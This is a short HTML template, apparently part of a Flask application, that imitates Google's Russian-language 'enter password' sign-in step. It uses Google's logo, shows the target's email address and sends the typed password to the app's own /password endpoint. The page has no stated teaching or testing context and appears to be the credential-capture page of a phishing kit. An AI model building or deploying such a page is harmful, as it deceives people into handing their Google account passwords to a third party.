<!DOCTYPE html>
<html lang="ru">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Введите пароль</title>
  <link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}">
  <link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
</head>
<body>
  <div class="container">
    <img src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png" alt="Google" class="logo">

    <h1>Введите пароль</h1>
    <p class="subtitle">{{ email }}</p>

    <form method="POST" action="/password">
      <input type="password" placeholder="Введите пароль" class="input" name="password" required />

      <a href="#" class="link">Забыли пароль?</a>

      <div class="bottom-links">
        <a href="/" class="link">Назад</a>
        <button type="submit" class="next-btn">Далее</button>
      </div>
    </form>

    <footer>
      <span>Русский</span>
    </footer>
  </div>
</body>
</html>